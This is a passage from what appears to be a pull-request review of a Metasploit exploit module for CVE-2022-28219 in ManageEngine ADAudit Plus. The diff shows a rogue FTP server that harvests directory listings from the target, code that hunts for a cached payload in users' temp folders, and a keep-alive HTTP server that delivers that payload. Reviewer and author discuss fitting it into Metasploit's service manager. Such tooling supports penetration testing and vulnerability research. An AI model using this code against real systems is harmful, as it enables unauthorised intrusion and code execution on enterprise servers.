modules/exploits/windows/http/manageengine_adaudit_plus_cve_2022_28219.rb

```diff
@@ -0,0 +1,365 @@
+
+        # Just enough FTP protocol to get what we need
+        ftp_client.print("200 hello I'm FTP\n")
+        ftp_client.print("331 password please\n")
+
+        # This technically sends too many requests for data, but that doesn't change anything
+        loop do
+          ftp_client.print("230 send data plz\n")
+          ftp_data += ftp_client.recv(256)
+        end
+      end
+    rescue Timeout::Error
+      # Do nothing, the FTP session is finished
+    ensure
+      ftp_server.close
+      if ftp_client
+        ftp_client.close
+      end
+    end
+
+    # If we actually received data, remove all the junk and split at newlines
+    if ftp_data =~ /RETR (.*)/m
+      return Regexp.last_match(1).split(/\n/).map(&:chomp)
+    end
+
+    # This is, unfortunately, the place where this fails the most - I'm not
+    # entirely sure why, but the reverse FTP connection seems to start failing
+    # if we mess with it too much. We do our best here to tell the user why.
+    if !ftp_client
+      print_warning("Didn't receive expected FTP connection")
+      return nil
+    end
+
+    if ftp_data.empty?
+      print_warning('FTP client connected, but we did not receive any data over the socket')
+      return nil
+    end
+
+    print_warning("FTP client connected, but we did not receive file list: #{ftp_data}")
+    return nil
+  end
+
+  def search_for_payloads(users)
+    return users.map do |u|
+      dir = "/users/#{u}/appdata/local/temp"
+      # This will search for the payload, but right now just print stuff
+      listing = get_directory_listing(dir)
+      if !listing
+        print_warning("Couldn't get directory listing for #{dir}")
+        next []
+      end
+
+      listing
+           .select { |f| f =~ /^jar_cache[0-9]+.tmp$/ }
+           .map { |f| File.join(dir, f) }
+    end.flatten
+  end
+
+  def upload_payload(payload)
+    t = Thread.new do
+      c = nil
+      begin
+        # We use a TCP socket here so we can hold the socket open after the HTTP
+        # conversation has concluded. That way, the server caches the file in
+        # the user's temp folder while it waits for more data
+        http_server = Rex::Socket::TcpServer.create(
+          'LocalPort' => datastore['SRVPORT_HTTP2'],
+          'LocalHost' => srv_host,
+          'Context' => {
+            'Msf' => framework,
+            'MsfExploit' => self
+          }
+        )
+
+        # Receive and discard the HTTP request
+        c = http_server.accept
+        c.recv(1024)
+        c.print "HTTP/1.1 200 OK\r\n"
+        c.print "Connection: keep-alive\r\n"
+        c.print "\r\n"
+        c.print payload
+
+        # This has to stay open as long as it takes to enumerate all users'
+        # directories to find then execute the payload. ~5 seconds works on
+        # a single-user system, but I increased this a lot for production.
+        # (This thread should be killed when the exploit completes in any case)
+        Rex.sleep(60)
```

Comment:
What are your thoughts on using the service manager to handle this; I think an example is over here of having both an http server and ftp server running:

https://github.com/rapid7/metasploit-framework/blob/234a83401b6856cebde96d0e14c4dc7e6ad1fd86/modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb

Admittedly it's still a bit of a janky experience writing mixins with multiple servers 😄

Reply:
I'm open to changing this to play better with Metasploit, but this is a bit of a weird requirement.

I have to serve the file with no `Content-Length` header, then keep the socket open so the server caches what it has on-disk and waits for more data to arrive. Most HTTP servers will use the protocol "properly" and close the connection when it's supposed to. Do you know if it's possible to do what I need in the service manager?